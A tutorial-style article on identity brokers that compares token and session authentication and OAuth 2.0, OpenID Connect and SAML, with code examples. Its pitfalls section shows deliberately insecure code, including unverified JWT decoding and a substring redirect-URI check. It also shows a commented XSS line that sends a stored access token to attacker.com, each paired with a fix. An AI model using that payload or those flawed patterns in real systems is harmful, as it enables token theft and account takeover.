- Understanding Identity Brokers
- Token-Based vs Session-Based Authentication
- Protocol Choices: OAuth 2.0, SAML, and OpenID Connect
- Common Pitfalls and Security Issues
- Conclusion
Identity brokers emerged as a solution to authentication sprawl in distributed systems. Rather than each application managing its own user credentials and authentication logic, an identity broker centralizes these concerns, providing single sign-on (SSO) and unified identity management. However, this centralization introduces new architectural challenges: session management complexity, single points of failure, and the delicate balance between security and user experience.
This exploration examines identity broker patterns across enterprise systems, cloud applications, and microservices architectures. We’ll dissect common implementation approaches, evaluate protocol choices between OAuth 2.0, SAML, and OpenID Connect, and understand the trade-offs between token-based and session-based authentication. Drawing from real-world implementations and security incidents, we uncover why identity brokers are both essential and complex.
Understanding Identity Brokers
Before diving into implementation patterns, it helps to understand what identity brokers do and why they exist. An identity broker sits between your applications and identity providers, translating authentication protocols and managing user sessions.
The Core Problem: Authentication Sprawl
Without an identity broker, each application manages authentication independently:
🚫 Problems Without Identity Brokers
Credential Duplication
- Users maintain separate credentials for each application
- Password reuse across systems creates security risks
- Password reset requires contacting each application
- No unified password policy enforcement
Integration Complexity
- Each application implements its own authentication
- Multiple integrations with identity providers
- Inconsistent security implementations
- Difficult to add new identity providers
User Experience Issues
- Users log in separately to each application
- No single sign-on across systems
- Session management inconsistencies
- Logout doesn't propagate across applications
Identity brokers solve these problems by centralizing authentication logic and providing a unified interface to applications.
What Identity Brokers Provide
An identity broker acts as an intermediary between applications and identity providers:
🔑 Identity Broker Capabilities
Protocol Translation
- Applications use one protocol (e.g., OAuth 2.0)
- Identity providers use different protocols (SAML, LDAP, OAuth)
- Broker translates between protocols
- Applications don't need provider-specific code
Single Sign-On (SSO)
- Users authenticate once with the broker
- Broker issues tokens/sessions to applications
- Applications trust the broker's authentication
- Seamless access across multiple applications
Identity Federation
- Connect multiple identity providers
- Users can authenticate with corporate AD, Google, GitHub, etc.
- Broker normalizes user attributes
- Unified identity across providers
Session Management
- Centralized session tracking
- Single logout across all applications
- Session timeout policies
- Concurrent session control
Popular identity brokers include Keycloak, Auth0, Okta, Microsoft Entra ID (formerly Azure AD), and Amazon Cognito.
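To make the "broker normalizes user attributes" idea concrete, here is a minimal sketch of attribute normalization. The attribute names in `ATTRIBUTE_MAPS` and the `NormalizedUser` type are assumptions chosen for illustration; real providers and deployments use their own attribute names.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class NormalizedUser:
    provider: str
    subject: str
    email: str
    display_name: str


# Hypothetical per-provider attribute names; adjust to what each provider actually sends.
ATTRIBUTE_MAPS = {
    "oidc": {"subject": "sub", "email": "email", "display_name": "name"},
    "saml": {"subject": "NameID", "email": "mail", "display_name": "displayName"},
    "ldap": {"subject": "uid", "email": "mail", "display_name": "cn"},
}


def normalize_user(provider: str, raw: dict) -> NormalizedUser:
    """Map provider-specific attributes onto one shape the applications can rely on."""
    mapping = ATTRIBUTE_MAPS[provider]
    return NormalizedUser(
        provider=provider,
        subject=str(raw[mapping["subject"]]),              # required attribute
        email=str(raw.get(mapping["email"], "")).lower(),  # optional, lowercased
        display_name=str(raw.get(mapping["display_name"], "")),
    )


ldap_user = normalize_user("ldap", {"uid": "jdoe", "mail": "JDoe@Example.com", "cn": "Jane Doe"})
oidc_user = normalize_user("oidc", {"sub": "1234", "email": "jdoe@example.com", "name": "Jane Doe"})
```

Applications then consume `NormalizedUser` and never see whether the user came from LDAP, SAML, or OIDC.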
Token-Based vs Session-Based Authentication
Identity brokers can implement authentication using tokens or sessions, each with distinct trade-offs.
Token-Based Authentication: Stateless and Scalable
Token-based authentication uses cryptographically signed tokens (typically JWTs) to represent authenticated users:
# Token-based authentication flow
from jose import jwt
from datetime import datetime, timedelta

class TokenAuthBroker:
    def __init__(self, secret_key):
        self.secret_key = secret_key

    def authenticate(self, username, password):
        # Verify credentials with identity provider
        if self.verify_credentials(username, password):
            # Issue JWT token
            payload = {
                'sub': username,
                'iat': datetime.utcnow(),
                'exp': datetime.utcnow() + timedelta(hours=1),
                'roles': self.get_user_roles(username)
            }
            token = jwt.encode(payload, self.secret_key, algorithm='HS256')
            return token
        return None

    def validate_token(self, token):
        try:
            payload = jwt.decode(token, self.secret_key, algorithms=['HS256'])
            return payload
        except jwt.ExpiredSignatureError:
            return None
        except jwt.JWTError:
            return None

# Application validates tokens without contacting broker
def protected_endpoint(request):
    token = request.headers.get('Authorization', '').replace('Bearer ', '')
    payload = broker.validate_token(token)
    if payload:
        return f"Welcome {payload['sub']}"
    return "Unauthorized", 401
✅ Token-Based Advantages
Stateless Architecture
- No server-side session storage required
- Applications validate tokens independently
- Horizontal scaling without session replication
- No session affinity needed in load balancers
Performance
- No database lookup for each request
- Validation is cryptographic signature check
- Reduced latency for authentication checks
- Lower load on identity broker
Microservices Friendly
- Tokens passed between services
- No shared session store required
- Services validate tokens independently
- Decoupled architecture
However, token-based authentication has significant drawbacks:
⚠️ Token-Based Challenges
Revocation Difficulty
- Tokens valid until expiration
- Cannot immediately revoke compromised tokens
- Logout doesn't invalidate existing tokens
- Requires token blacklist (defeats stateless benefit)
Token Size
- JWTs contain user data and claims
- Sent with every request
- Larger than session IDs
- Bandwidth overhead for mobile clients
Security Risks
- Tokens stored in browser (XSS vulnerability)
- Long-lived tokens increase exposure window
- Token theft allows impersonation until expiration
- Refresh token management complexity
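The revocation problem is easier to see in code. Below is a minimal sketch of a token denylist, assuming each token carries a unique `jti` (JWT ID) claim, which the example broker above does not issue. The class and method names are hypothetical. Note that every validating service must consult this shared state, which is exactly the stateless benefit being traded away.

```python
import time


class TokenDenylist:
    """Remembers revoked token IDs only until those tokens would expire anyway."""

    def __init__(self):
        self._revoked = {}  # jti -> exp (Unix seconds)

    def revoke(self, jti, exp):
        self._revoked[jti] = exp

    def is_revoked(self, jti, now=None):
        now = time.time() if now is None else now
        # Drop entries whose tokens have expired; they are rejected on exp alone.
        self._revoked = {j: e for j, e in self._revoked.items() if e > now}
        return jti in self._revoked


denylist = TokenDenylist()
denylist.revoke("token-abc", exp=1000)
```

Because entries are purged once the token's own expiry passes, the denylist stays roughly as small as the number of revocations within one token lifetime.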
Session-Based Authentication: Stateful but Controllable
Session-based authentication uses server-side sessions with session IDs sent to clients:
# Session-based authentication flow
import secrets
from datetime import datetime, timedelta

class SessionAuthBroker:
    def __init__(self):
        self.sessions = {}  # In production: Redis, database

    def authenticate(self, username, password):
        # Verify credentials with identity provider
        if self.verify_credentials(username, password):
            # Create session
            session_id = secrets.token_urlsafe(32)
            self.sessions[session_id] = {
                'username': username,
                'created': datetime.utcnow(),
                'expires': datetime.utcnow() + timedelta(hours=1),
                'roles': self.get_user_roles(username)
            }
            return session_id
        return None

    def validate_session(self, session_id):
        session = self.sessions.get(session_id)
        if session and session['expires'] > datetime.utcnow():
            return session
        return None

    def revoke_session(self, session_id):
        # Immediate revocation
        if session_id in self.sessions:
            del self.sessions[session_id]
            return True
        return False

# Application checks session with broker
def protected_endpoint(request):
    session_id = request.cookies.get('session_id')
    session = broker.validate_session(session_id)
    if session:
        return f"Welcome {session['username']}"
    return "Unauthorized", 401
✅ Session-Based Advantages
Immediate Revocation
- Sessions stored server-side
- Logout immediately invalidates session
- Compromised sessions can be revoked instantly
- Fine-grained session control
Smaller Client Storage
- Only session ID sent to client
- Minimal bandwidth overhead
- User data stored server-side
- Reduced XSS exposure
Flexible Session Management
- Update session data without client changes
- Track session activity and location
- Implement concurrent session limits
- Rich session metadata
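Concurrent session limits are one of the controls that server-side state makes straightforward. The sketch below is one possible policy (evict the oldest session when the limit is reached); the `LimitedSessionStore` class and its in-memory storage are assumptions for illustration, not part of the broker shown above.

```python
import secrets
from collections import defaultdict, deque


class LimitedSessionStore:
    """Keeps at most N sessions per user, evicting the oldest first."""

    def __init__(self, max_sessions_per_user=2):
        self.max_sessions = max_sessions_per_user
        self.sessions = {}                 # session_id -> username
        self.by_user = defaultdict(deque)  # username -> session IDs, oldest first

    def create(self, username):
        user_sessions = self.by_user[username]
        # Make room before creating the new session.
        while len(user_sessions) >= self.max_sessions:
            oldest = user_sessions.popleft()
            self.sessions.pop(oldest, None)
        session_id = secrets.token_urlsafe(32)
        self.sessions[session_id] = username
        user_sessions.append(session_id)
        return session_id

    def is_active(self, session_id):
        return session_id in self.sessions


store = LimitedSessionStore(max_sessions_per_user=2)
first = store.create("alice")
second = store.create("alice")
third = store.create("alice")  # evicts `first`
```

A stricter policy could refuse the new login instead of evicting; which is right depends on the application.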
Session-based authentication also has trade-offs:
⚠️ Session-Based Challenges
Scalability Complexity
- Requires shared session store (Redis, database)
- Session replication across servers
- Load balancer session affinity or sticky sessions
- Horizontal scaling more complex
Performance Overhead
- Database lookup for each request
- Network latency to session store
- Higher load on identity broker
- Potential bottleneck at scale
Distributed System Challenges
- Microservices must call broker for validation
- Network dependency for each request
- Increased latency in service chains
- Broker becomes critical dependency
Hybrid Approach: Short-Lived Tokens with Refresh Tokens
Many modern systems use a hybrid approach combining benefits of both:
# Hybrid authentication with access and refresh tokens
import secrets
from datetime import datetime, timedelta
from jose import jwt

class HybridAuthBroker:
    def __init__(self, secret_key):
        self.secret_key = secret_key
        self.refresh_tokens = {}  # Server-side refresh token store

    def authenticate(self, username, password):
        if self.verify_credentials(username, password):
            # Short-lived access token (15 minutes)
            access_token = jwt.encode({
                'sub': username,
                'exp': datetime.utcnow() + timedelta(minutes=15),
                'type': 'access'
            }, self.secret_key, algorithm='HS256')
            # Long-lived refresh token (7 days) stored server-side
            refresh_token = secrets.token_urlsafe(32)
            self.refresh_tokens[refresh_token] = {
                'username': username,
                'expires': datetime.utcnow() + timedelta(days=7)
            }
            return {
                'access_token': access_token,
                'refresh_token': refresh_token,
                'expires_in': 900  # 15 minutes
            }
        return None

    def refresh_access_token(self, refresh_token):
        # Validate refresh token (server-side check)
        token_data = self.refresh_tokens.get(refresh_token)
        if token_data and token_data['expires'] > datetime.utcnow():
            # Issue new access token
            access_token = jwt.encode({
                'sub': token_data['username'],
                'exp': datetime.utcnow() + timedelta(minutes=15),
                'type': 'access'
            }, self.secret_key, algorithm='HS256')
            return access_token
        return None

    def logout(self, refresh_token):
        # Revoke refresh token
        if refresh_token in self.refresh_tokens:
            del self.refresh_tokens[refresh_token]
🎯 Hybrid Approach Benefits
Balanced Security
- Short-lived access tokens limit exposure window
- Compromised access token expires quickly
- Refresh tokens can be revoked immediately
- Logout invalidates refresh token
Performance and Scalability
- Access tokens validated locally (stateless)
- Refresh token checks infrequent (every 15 minutes)
- Reduced load on identity broker
- Scalable like token-based auth
User Experience
- Seamless token refresh in background
- No frequent re-authentication
- Logout works immediately
- Balance between security and convenience
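OAuth 2.0 defines refresh tokens for exactly this pattern, and OpenID Connect inherits them. Pairing short-lived access tokens with revocable, server-side refresh tokens is widely regarded as a best practice.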
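One common hardening of the refresh step, not shown in the broker above, is refresh token rotation: every refresh consumes the old token and issues a new one, and reuse of a spent token is treated as a sign of theft. The following is a minimal in-memory sketch under those assumptions; `RotatingRefreshStore` and its method names are hypothetical.

```python
import secrets
import time


class RotatingRefreshStore:
    """Single-use refresh tokens with replay detection."""

    def __init__(self, lifetime_seconds=7 * 24 * 3600):
        self.lifetime = lifetime_seconds
        self.active = {}  # token -> (username, expires_at)
        self.used = {}    # spent token -> username

    def issue(self, username, now=None):
        now = time.time() if now is None else now
        token = secrets.token_urlsafe(32)
        self.active[token] = (username, now + self.lifetime)
        return token

    def rotate(self, token, now=None):
        """Exchange a refresh token for a new one, or return None if rejected."""
        now = time.time() if now is None else now
        if token in self.used:
            # A spent token was replayed: revoke everything this user holds.
            self.revoke_user(self.used[token])
            return None
        entry = self.active.pop(token, None)
        if entry is None or entry[1] <= now:
            return None
        username = entry[0]
        self.used[token] = username
        return self.issue(username, now)

    def revoke_user(self, username):
        self.active = {t: e for t, e in self.active.items() if e[0] != username}


refresh_store = RotatingRefreshStore()
t1 = refresh_store.issue("alice", now=0)
t2 = refresh_store.rotate(t1, now=10)        # normal refresh
replayed = refresh_store.rotate(t1, now=20)  # stolen or replayed token
after_replay = refresh_store.rotate(t2, now=30)
```

The trade-off is that a legitimate client that retries a refresh after a network failure can trip the replay check, so production systems often allow a short grace window.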
Protocol Choices: OAuth 2.0, SAML, and OpenID Connect
Identity brokers must support various authentication protocols. Understanding their differences is crucial for implementation decisions.
OAuth 2.0: Authorization Framework
OAuth 2.0 is an authorization framework, not an authentication protocol, though often used for both:
# OAuth 2.0 Authorization Code Flow
import secrets
from urllib.parse import urlencode

from flask import Flask, request, redirect, session
import requests

app = Flask(__name__)
app.secret_key = 'change-me'  # Needed for Flask sessions; load from configuration in practice

BROKER_AUTH_URL = 'https://broker.example.com/oauth/authorize'
BROKER_TOKEN_URL = 'https://broker.example.com/oauth/token'
CLIENT_ID = 'your_client_id'
CLIENT_SECRET = 'your_client_secret'
REDIRECT_URI = 'https://app.example.com/callback'

@app.route('/login')
def login():
    # Random state ties the callback to this browser session (CSRF protection)
    state = secrets.token_urlsafe(16)
    session['oauth_state'] = state
    # URL-encode the parameters; the scope value contains spaces
    params = urlencode({
        'client_id': CLIENT_ID,
        'redirect_uri': REDIRECT_URI,
        'response_type': 'code',
        'scope': 'openid profile email',
        'state': state
    })
    # Redirect user to identity broker
    return redirect(f"{BROKER_AUTH_URL}?{params}")

@app.route('/callback')
def callback():
    # Reject callbacks whose state does not match the one issued at login
    expected_state = session.pop('oauth_state', None)
    if not expected_state or request.args.get('state') != expected_state:
        return "Invalid state", 400
    # Broker redirects back with authorization code
    code = request.args.get('code')
    # Exchange code for access token
    token_response = requests.post(BROKER_TOKEN_URL, data={
        'grant_type': 'authorization_code',
        'code': code,
        'redirect_uri': REDIRECT_URI,
        'client_id': CLIENT_ID,
        'client_secret': CLIENT_SECRET
    })
    tokens = token_response.json()
    access_token = tokens['access_token']
    # Use access token to get user info
    user_response = requests.get(
        'https://broker.example.com/userinfo',
        headers={'Authorization': f'Bearer {access_token}'}
    )
    user_info = user_response.json()
    # Create application session with user_info
    return f"Welcome {user_info['name']}"
📋 OAuth 2.0 Characteristics
Designed For
- Delegated authorization
- Third-party API access
- Mobile and web applications
- Modern REST APIs
Advantages
- Simple HTTP-based protocol
- Wide industry adoption
- Mobile-friendly
- Flexible grant types
Limitations
- Not designed for authentication
- No standard user info format
- Requires additional profile endpoint
- Token format not standardized
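The callback above reads `tokens['access_token']` directly, which fails with a `KeyError` when the broker returns an error. A slightly more defensive sketch follows. The field names (`error`, `error_description`, `access_token`, `token_type`, `expires_in`, `refresh_token`) come from the OAuth 2.0 specification; the function and exception names are hypothetical.

```python
class TokenResponseError(Exception):
    """Raised when the token endpoint response cannot be used."""


def parse_token_response(body: dict) -> dict:
    """Validate the JSON body returned by an OAuth 2.0 token endpoint."""
    if "error" in body:
        message = body["error"]
        if body.get("error_description"):
            message += f": {body['error_description']}"
        raise TokenResponseError(message)

    access_token = body.get("access_token")
    if not access_token:
        raise TokenResponseError("response has no access_token")

    # token_type is case-insensitive; this sketch only handles bearer tokens.
    token_type = body.get("token_type", "")
    if token_type.lower() != "bearer":
        raise TokenResponseError(f"unsupported token_type: {token_type!r}")

    return {
        "access_token": access_token,
        "expires_in": body.get("expires_in"),        # optional
        "refresh_token": body.get("refresh_token"),  # optional
    }


parsed = parse_token_response(
    {"access_token": "abc", "token_type": "Bearer", "expires_in": 900}
)
```

In the Flask callback this would be called as `parse_token_response(token_response.json())`, with the exception mapped to an error page.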
OpenID Connect: Authentication Layer on OAuth 2.0
OpenID Connect (OIDC) extends OAuth 2.0 specifically for authentication:
# OpenID Connect adds ID token to OAuth 2.0 flow
from jose import jwt

@app.route('/oidc-callback')
def oidc_callback():
    code = request.args.get('code')
    # Exchange code for tokens
    token_response = requests.post(BROKER_TOKEN_URL, data={
        'grant_type': 'authorization_code',
        'code': code,
        'redirect_uri': REDIRECT_URI,
        'client_id': CLIENT_ID,
        'client_secret': CLIENT_SECRET
    })
    tokens = token_response.json()
    id_token = tokens['id_token']  # OIDC adds ID token
    access_token = tokens['access_token']
    # Validate and decode ID token
    # ID token contains user identity claims
    user_claims = jwt.decode(
        id_token,
        key=get_broker_public_key(),
        algorithms=['RS256'],
        audience=CLIENT_ID,
        issuer='https://broker.example.com',  # Validate issuer as well as audience
        access_token=access_token  # Lets python-jose check the at_hash claim if present
    )
    # ID token contains: sub, name, email, etc.
    return f"Welcome {user_claims['name']} ({user_claims['email']})"
✅ OpenID Connect Advantages
Purpose-Built for Authentication
- ID token contains user identity
- Standardized user claims
- No additional profile endpoint needed
- Clear authentication semantics
Security Features
- ID token is signed JWT
- Cryptographic validation
- Audience and issuer validation
- Nonce for replay protection
Industry Standard
- Supported by all major identity providers
- Extensive library support
- Well-documented specifications
- Active development and updates
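The issuer, audience, and nonce checks listed under Security Features can be sketched independently of any JWT library. The function below assumes the ID token's signature has already been verified and that the application stored `expected_nonce` when it started the login; the function name and return convention are hypothetical.

```python
import hmac
import time


def check_id_token_claims(claims, *, expected_issuer, client_id, expected_nonce, now=None):
    """Return a list of problems; an empty list means the claims passed these checks."""
    now = time.time() if now is None else now
    problems = []

    if claims.get("iss") != expected_issuer:
        problems.append("issuer mismatch")

    # aud may be a single string or a list of strings.
    aud = claims.get("aud")
    audiences = aud if isinstance(aud, list) else [aud]
    if client_id not in audiences:
        problems.append("audience mismatch")

    exp = claims.get("exp")
    if not isinstance(exp, (int, float)) or exp <= now:
        problems.append("token expired")

    # The nonce must equal the value sent in the authentication request.
    nonce = claims.get("nonce")
    if not isinstance(nonce, str) or not hmac.compare_digest(
        nonce.encode(), expected_nonce.encode()
    ):
        problems.append("nonce mismatch")

    return problems


sample_claims = {
    "iss": "https://broker.example.com",
    "aud": "my-client",
    "exp": 2000,
    "nonce": "n-123",
}
```

A replayed ID token from an earlier login carries the earlier nonce, so it fails the last check even though its signature is valid.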
SAML 2.0: Enterprise Standard
SAML (Security Assertion Markup Language) is the traditional enterprise authentication protocol:
# SAML 2.0 authentication flow (simplified)
import base64
import zlib
from datetime import datetime
from urllib.parse import urlencode

from lxml import etree
from signxml import XMLVerifier

@app.route('/saml/login')
def saml_login():
    # Generate SAML authentication request
    saml_request = f"""
    <samlp:AuthnRequest xmlns:samlp="urn:oasis:names:tc:SAML:2.0:protocol"
        ID="{generate_request_id()}"
        Version="2.0"
        IssueInstant="{datetime.utcnow().isoformat()}Z"
        Destination="{BROKER_SSO_URL}">
        <saml:Issuer xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">{SERVICE_PROVIDER_ID}</saml:Issuer>
    </samlp:AuthnRequest>
    """
    # HTTP-Redirect binding: raw DEFLATE, then base64, then URL-encode
    compressor = zlib.compressobj(wbits=-15)
    deflated = compressor.compress(saml_request.encode()) + compressor.flush()
    encoded_request = base64.b64encode(deflated).decode()
    sso_url = f"{BROKER_SSO_URL}?{urlencode({'SAMLRequest': encoded_request})}"
    return redirect(sso_url)

@app.route('/saml/acs', methods=['POST'])
def saml_assertion_consumer():
    # Broker posts SAML response back
    saml_response = request.form['SAMLResponse']
    decoded_response = base64.b64decode(saml_response)
    # Validate SAML assertion signature
    xml_doc = etree.fromstring(decoded_response)
    verified_data = XMLVerifier().verify(
        xml_doc,
        x509_cert=get_broker_certificate()
    ).signed_xml
    # Extract user attributes only from the verified, signed XML;
    # reading from xml_doc would trust content the signature may not cover
    nameid = verified_data.find('.//{urn:oasis:names:tc:SAML:2.0:assertion}NameID').text
    attributes = extract_saml_attributes(verified_data)
    return f"Welcome {attributes['name']}"
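The SAML handler above calls `extract_saml_attributes` without defining it. One possible shape for that helper is sketched here with the standard library's ElementTree so it runs on its own; the function name comes from the snippet above, while the body and the sample assertion are assumptions. It should only ever be given XML whose signature has already been verified.

```python
import xml.etree.ElementTree as ET

SAML_NS = {"saml": "urn:oasis:names:tc:SAML:2.0:assertion"}


def extract_saml_attributes(assertion_root):
    """Collect Attribute name/value pairs from a (verified) SAML assertion."""
    attributes = {}
    for attribute in assertion_root.iterfind(".//saml:Attribute", SAML_NS):
        name = attribute.get("Name")
        values = [v.text or "" for v in attribute.findall("saml:AttributeValue", SAML_NS)]
        if name and values:
            # Single-valued attributes become strings, multi-valued ones lists.
            attributes[name] = values[0] if len(values) == 1 else values
    return attributes


# Hypothetical assertion fragment for illustration only.
SAMPLE_ASSERTION = """
<saml:Assertion xmlns:saml="urn:oasis:names:tc:SAML:2.0:assertion">
  <saml:AttributeStatement>
    <saml:Attribute Name="name">
      <saml:AttributeValue>Jane Doe</saml:AttributeValue>
    </saml:Attribute>
    <saml:Attribute Name="groups">
      <saml:AttributeValue>admins</saml:AttributeValue>
      <saml:AttributeValue>devs</saml:AttributeValue>
    </saml:Attribute>
  </saml:AttributeStatement>
</saml:Assertion>
"""

sample_attributes = extract_saml_attributes(ET.fromstring(SAMPLE_ASSERTION.strip()))
```

Attribute names vary by identity provider, so a real integration usually pairs this with a per-provider mapping.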
🏢 SAML Characteristics
Designed For
- Enterprise single sign-on
- Federation between organizations
- Legacy enterprise systems
- Strong security requirements
Advantages
- Mature and battle-tested
- Rich attribute exchange
- Strong security features
- Enterprise adoption
Disadvantages
- XML-based (verbose and complex)
- Not mobile-friendly
- Steep learning curve
- Limited modern tooling
Protocol Selection Guide
🎯 Choosing the Right Protocol
Use OpenID Connect When:
- Building new applications
- Need mobile support
- Want modern REST APIs
- Require simple integration
- Target consumer users
Use SAML When:
- Integrating with enterprise systems
- Required by corporate IT policies
- Need rich attribute exchange
- Federation with other organizations
- Legacy system compatibility required
Use OAuth 2.0 When:
- Need API authorization (not authentication)
- Third-party access to resources
- Delegated permissions
- Combined with OIDC for authentication
Modern identity brokers like Keycloak support all three protocols, allowing applications to choose based on their needs.
Common Pitfalls and Security Issues
Identity broker implementations often suffer from common security vulnerabilities and design mistakes.
Pitfall 1: Storing Tokens in Local Storage
Many applications store tokens in browser local storage, creating XSS vulnerabilities:
// ❌ INSECURE: Storing tokens in local storage
function login(username, password) {
    fetch('/api/login', {
        method: 'POST',
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ username, password })
    })
    .then(res => res.json())
    .then(data => {
        // Vulnerable to XSS attacks
        localStorage.setItem('access_token', data.access_token);
        localStorage.setItem('refresh_token', data.refresh_token);
    });
}

// Any XSS vulnerability can steal tokens
// <script>
//   fetch('https://attacker.com/steal?token=' + localStorage.getItem('access_token'));
// </script>
🚫 Local Storage Vulnerabilities
XSS Attack Vector
- JavaScript can access local storage
- Any XSS vulnerability exposes tokens
- Third-party scripts can steal tokens
- No protection against script injection
Impact
- Complete account takeover
- Tokens valid until expiration
- Attacker can impersonate user
- Difficult to detect theft
Better approach using HTTP-only cookies:
# ✅ SECURE: Using HTTP-only cookies
# Server sets HTTP-only cookie (JavaScript cannot access)
from flask import make_response

@app.route('/api/login', methods=['POST'])
def login():
    data = request.json
    tokens = broker.authenticate(data['username'], data['password'])
    if not tokens:
        return {'error': 'Invalid credentials'}, 401
    response = make_response({'status': 'success'})
    # HTTP-only cookie prevents JavaScript access
    response.set_cookie(
        'access_token',
        tokens['access_token'],
        httponly=True,      # Prevents JavaScript access
        secure=True,        # HTTPS only
        samesite='Strict'   # CSRF protection
    )
    return response

// Client-side: No token handling needed
function login(username, password) {
    fetch('/api/login', {
        method: 'POST',
        credentials: 'include',  // Send cookies
        headers: { 'Content-Type': 'application/json' },
        body: JSON.stringify({ username, password })
    });
}
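To see what those cookie flags look like on the wire, the sketch below builds the equivalent `Set-Cookie` header value with Python's standard library. The `build_token_cookie` helper and the added `Path` and `Max-Age` attributes are assumptions for illustration; a framework such as Flask generates this header for you.

```python
from http.cookies import SimpleCookie


def build_token_cookie(name, value, max_age_seconds):
    """Return a Set-Cookie header value with HttpOnly, Secure, and SameSite=Strict."""
    cookie = SimpleCookie()
    cookie[name] = value
    morsel = cookie[name]
    morsel["httponly"] = True     # Not readable from JavaScript
    morsel["secure"] = True       # Sent over HTTPS only
    morsel["samesite"] = "Strict" # Not sent on cross-site requests
    morsel["path"] = "/"
    morsel["max-age"] = max_age_seconds  # Match the access token lifetime
    return morsel.OutputString()


header_value = build_token_cookie("access_token", "abc", 900)
```

Setting `Max-Age` to the token lifetime keeps the browser from sending a cookie that the server would reject anyway.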
Pitfall 2: Missing Token Validation
Applications sometimes skip proper token validation:
# ❌ INSECURE: Trusting token without validation
from jose import jwt

@app.route('/api/user')
def get_user():
    token = request.headers.get('Authorization', '').replace('Bearer ', '')
    # Reading claims without verifying the signature, expiration, or audience!
    payload = jwt.get_unverified_claims(token)
    return {'user': payload['sub']}  # Attacker can forge tokens!
🚫 Validation Failures
Missing Signature Verification
- Attacker can create fake tokens
- No cryptographic validation
- Complete authentication bypass
Missing Expiration Check
- Expired tokens still accepted
- Stolen tokens valid indefinitely
- No time-based security
Missing Audience Validation
- Tokens from other applications accepted
- Cross-application token reuse
- Privilege escalation risks
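To show what each of these checks actually does, here is a standard-library sketch that signs and verifies an HS256 token by hand. It is for illustration only, with hypothetical helper names; in an application, use a maintained JWT library rather than code like this.

```python
import base64
import hashlib
import hmac
import json
import time


def _b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()


def _b64url_decode(segment: str) -> bytes:
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def sign_hs256(claims: dict, secret: bytes) -> str:
    header = _b64url_encode(json.dumps({"alg": "HS256", "typ": "JWT"}).encode())
    payload = _b64url_encode(json.dumps(claims).encode())
    signature = hmac.new(secret, f"{header}.{payload}".encode(), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url_encode(signature)}"


def verify_hs256(token: str, secret: bytes, audience: str, now=None):
    """Return the claims if signature, expiration, and audience all check out, else None."""
    now = time.time() if now is None else now
    try:
        header_b64, payload_b64, signature_b64 = token.split(".")
        header = json.loads(_b64url_decode(header_b64))
        signature = _b64url_decode(signature_b64)
    except ValueError:
        return None
    # Pin the algorithm instead of trusting whatever the token header claims.
    if not isinstance(header, dict) or header.get("alg") != "HS256":
        return None
    # 1. Signature: recompute the MAC and compare in constant time.
    expected = hmac.new(secret, f"{header_b64}.{payload_b64}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(signature, expected):
        return None
    claims = json.loads(_b64url_decode(payload_b64))
    # 2. Expiration: a missing exp is treated as already expired.
    if claims.get("exp", 0) <= now:
        return None
    # 3. Audience: the token must have been issued for this application.
    if claims.get("aud") != audience:
        return None
    return claims


demo_secret = b"demo-secret"
demo_token = sign_hs256({"sub": "alice", "aud": "my-application", "exp": 2000}, demo_secret)
```

Skipping any one of the three numbered steps reproduces the corresponding failure in the list above.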
Proper token validation:
# ✅ SECURE: Complete token validation
from jose import jwt, JWTError

@app.route('/api/user')
def get_user():
    token = request.headers.get('Authorization', '').replace('Bearer ', '')
    try:
        payload = jwt.decode(
            token,
            key=get_public_key(),
            algorithms=['RS256'],                # Specify allowed algorithms
            audience='my-application',           # Validate audience
            issuer='https://broker.example.com'  # Validate issuer
        )
        # Token is valid and verified
        return {'user': payload['sub']}
    except jwt.ExpiredSignatureError:
        return {'error': 'Token expired'}, 401
    except jwt.JWTClaimsError:
        return {'error': 'Invalid claims'}, 401
    except JWTError:
        return {'error': 'Invalid token'}, 401
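The examples above extract the token with `.replace('Bearer ', '')`, which also accepts headers that use a different scheme or contain extra parts. A stricter parser is short; this is a sketch, and `parse_bearer_token` is a hypothetical helper name.

```python
def parse_bearer_token(authorization_header):
    """Return the token from an 'Authorization: Bearer <token>' header, or None."""
    if not authorization_header:
        return None
    parts = authorization_header.split()
    # Expect exactly two parts: the scheme and the token.
    if len(parts) != 2 or parts[0].lower() != "bearer":
        return None
    return parts[1]
```

In the Flask handler this would replace the first line of the function: `token = parse_bearer_token(request.headers.get('Authorization'))`, followed by a 401 response when the result is `None`.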
Pitfall 3: Insecure Redirect URIs
OAuth 2.0 redirect URI validation is critical for security:
# ❌ INSECURE: Weak redirect URI validation
@app.route('/oauth/authorize')
def authorize():
    client_id = request.args.get('client_id')
    redirect_uri = request.args.get('redirect_uri')
    # Weak validation: substring match
    if 'example.com' in redirect_uri:
        # Generate authorization code
        code = generate_auth_code(client_id)
        return redirect(f"{redirect_uri}?code={code}")
    return "Invalid redirect URI", 400

# Attacker can use: https://evil.com?victim=example.com
# Validation passes, code sent to attacker!
🚫 Redirect URI Vulnerabilities
Open Redirect
- Authorization codes sent to attacker
- Account takeover possible
- Phishing attacks enabled
Subdomain Attacks
- Weak validation allows subdomains
- Attacker registers malicious subdomain
- Steals authorization codes
Secure redirect URI validation:
# ✅ SECURE: Strict redirect URI validation
REGISTERED_CLIENTS = {
    'client123': {
        'redirect_uris': [
            'https://app.example.com/callback',
            'https://app.example.com/oauth/callback'
        ]
    }
}

@app.route('/oauth/authorize')
def authorize():
    client_id = request.args.get('client_id')
    redirect_uri = request.args.get('redirect_uri')
    # Exact match against registered URIs
    client = REGISTERED_CLIENTS.get(client_id)
    if not client or redirect_uri not in client['redirect_uris']:
        return "Invalid redirect URI", 400
    code = generate_auth_code(client_id)
    return redirect(f"{redirect_uri}?code={code}")
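The difference between the two checks is easy to demonstrate outside of Flask. The sketch below runs a few attacker-style URIs through a substring check and an exact-match check; the URIs and function names are made up for illustration.

```python
REGISTERED_URIS = frozenset({"https://app.example.com/callback"})


def weak_check(redirect_uri: str) -> bool:
    # Substring match, as in the insecure example
    return "example.com" in redirect_uri


def strict_check(redirect_uri: str) -> bool:
    # Exact string match against the registered set
    return redirect_uri in REGISTERED_URIS


# Hypothetical attacker-controlled URIs that merely mention example.com
ATTACK_URIS = [
    "https://evil.com?victim=example.com",
    "https://example.com.evil.net/callback",
    "https://app.example.com/callback/../steal",
]


def compare_checks():
    """Map each attack URI to (passes weak check, passes strict check)."""
    return {uri: (weak_check(uri), strict_check(uri)) for uri in ATTACK_URIS}


results = compare_checks()
```

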